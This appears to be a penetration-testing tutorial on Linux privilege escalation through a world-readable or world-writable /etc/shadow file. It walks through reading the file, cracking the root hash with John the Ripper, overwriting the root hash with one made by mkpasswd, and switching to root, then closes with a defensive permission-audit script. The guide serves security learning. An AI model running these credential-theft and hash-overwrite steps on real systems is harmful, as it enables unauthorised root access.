# Weak File Permission - /etc/shadow Readable and Writable

The /etc/shadow file plays a critical role in system security as it contains user password hashes, which are essential for verifying user credentials during login. Due to its sensitive nature, the /etc/shadow file is typically configured to be readable only by the root user.

<figure><img src="/files/wCjyCRzHU9jko15cQI5x" alt=""><figcaption></figcaption></figure>

## Exploit Only Limited to /etc/shadow Readable <a href="#c7b8" id="c7b8"></a>

However, on our target machine, the /etc/shadow file is misconfigured to be readable by all users on the system.

```
ls -la /etc/shadow            #to view the permission of /etc/shadow
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*SiILUV0JswnVzweHIhyDNg.png" alt="" height="109" width="700"><figcaption><p>readable permission for all users</p></figcaption></figure>

```
cat /etc/shadow          #to view the shadow file
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*aOeX4MCvw4r4XVIxf3WFBg.png" alt="" height="277" width="700"><figcaption><p>root user password hash value</p></figcaption></figure>

After obtaining the hash value of the root user using the ‘cat’ command, we need to copy that hash and paste it into a new file. I named this file ‘hash.txt’ and then utilized the ‘John the Ripper’ (John) password cracking tool to crack the password and obtain the plaintext password.

```
john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*AWbMpXVjoJhBvsp4UJmZ2A.png" alt="" height="208" width="700"><figcaption><p>john for password cracking</p></figcaption></figure>

After obtaining the plaintext password, we can use the ‘su’ (switch user) Linux command to switch to the root user.

```
su root                         #login with cracked password 'password123'
whoami;id;pwd
```

<div align="center" data-full-width="false"><figure><img src="https://miro.medium.com/v2/resize:fit:875/1*PzNydcGQMr8eN73JcA4Mag.png" alt="" height="124" width="700"><figcaption><p>gained root user privilege.</p></figcaption></figure></div>

## Exploit Only Limited to /etc/shadow Writable <a href="#c521" id="c521"></a>

We need to identify whether /etc/shadow is writable by all users by using the command ‘ls -la /etc/shadow’.

```
ls -la /etc/shadow
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*SiILUV0JswnVzweHIhyDNg.png" alt="" height="109" width="700"><figcaption><p>/etc/shadow writable permission for all the users.</p></figcaption></figure>

If writable permissions are enabled for all users, we need to generate a new password hash value using the ‘mkpasswd’ utility with the SHA-512 algorithm, as Linux passwords are stored in /etc/shadow as SHA-512 hashes.

```
mkpasswd -m sha-512 sekkio123
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*QUBD-NIxQNcyF-Yi_sMEQg.png" alt="" height="90" width="700"><figcaption><p>mkpasswd to generate custom password.</p></figcaption></figure>

Next, we need to overwrite the root user’s password field in `/etc/shadow` with the custom-generated password hash value.

```
nano /etc/shadow
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*lYnNdRQMH9yeHDfmm-xE2g.png" alt="" height="284" width="700"><figcaption><p>overwrite custom-generated password in /etc/shadow file</p></figcaption></figure>

Once the custom-generated password hash has been written into the /etc/shadow file, we can use the ‘su’ (switch user) Linux command to switch to the root user.

```
su root                           #login with custom password 'sekkio123'
whoami;id;pwd
```

<figure><img src="https://miro.medium.com/v2/resize:fit:875/1*zZq4NdF0hZ4hCIUwZWeRug.png" alt="" height="139" width="700"><figcaption><p>gained root user privilege.</p></figcaption></figure>
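Both misconfigurations shown above (world-readable and world-writable /etc/shadow) can be caught from the defender's side with a single permission check. The script below is an added example, not part of the original write-up; the function name `audit_shadow` and its optional expected-UID argument are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): audit the permissions abused above.
# audit_shadow FILE [EXPECTED_UID]   (function name and arguments are illustrative)
#   returns 0 = clean, 1 = at least one finding, 2 = file could not be listed
audit_shadow() {
    file=$1
    want_uid=${2:-0}                                 # the owner should be root (uid 0)
    line=$(ls -ldn -- "$file" 2>/dev/null) || { echo "ERROR: cannot list $file"; return 2; }
    perms=$(printf '%s\n' "$line" | cut -c1-10)      # e.g. -rw-r-----
    uid=$(printf '%s\n' "$line" | awk '{print $3}')  # numeric owner from ls -n
    rc=0

    # Position 8 is other-read: every local user can copy the hashes.
    case $perms in
        ???????r??) echo "FINDING: $file is world-readable ($perms)"; rc=1 ;;
    esac
    # Position 9 is other-write: every local user can replace a hash.
    case $perms in
        ????????w?) echo "FINDING: $file is world-writable ($perms)"; rc=1 ;;
    esac
    # Position 6 is group-write: members of the owning group can replace a hash.
    case $perms in
        ?????w????) echo "FINDING: $file is group-writable ($perms)"; rc=1 ;;
    esac
    if [ "$uid" != "$want_uid" ]; then
        echo "FINDING: $file is owned by uid $uid, expected $want_uid"; rc=1
    fi
    return "$rc"
}

# Typical fix on Debian-family systems (RHEL-family ships root:root with mode 000):
#   chown root:shadow /etc/shadow && chmod 640 /etc/shadow
audit_shadow /etc/shadow || true
```

The permission string is the same one `ls -la /etc/shadow` prints in the steps above, so each finding maps directly to a character in that output.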

#### About Seckio

Seckio is a cybersecurity and technology company that builds security-first platforms and products while also providing expert offensive security services. Seckio operates across multiple areas of cybersecurity, including Vulnerability Assessment and Penetration Testing (VAPT), offensive security assessments, and compliance for modern digital environments.



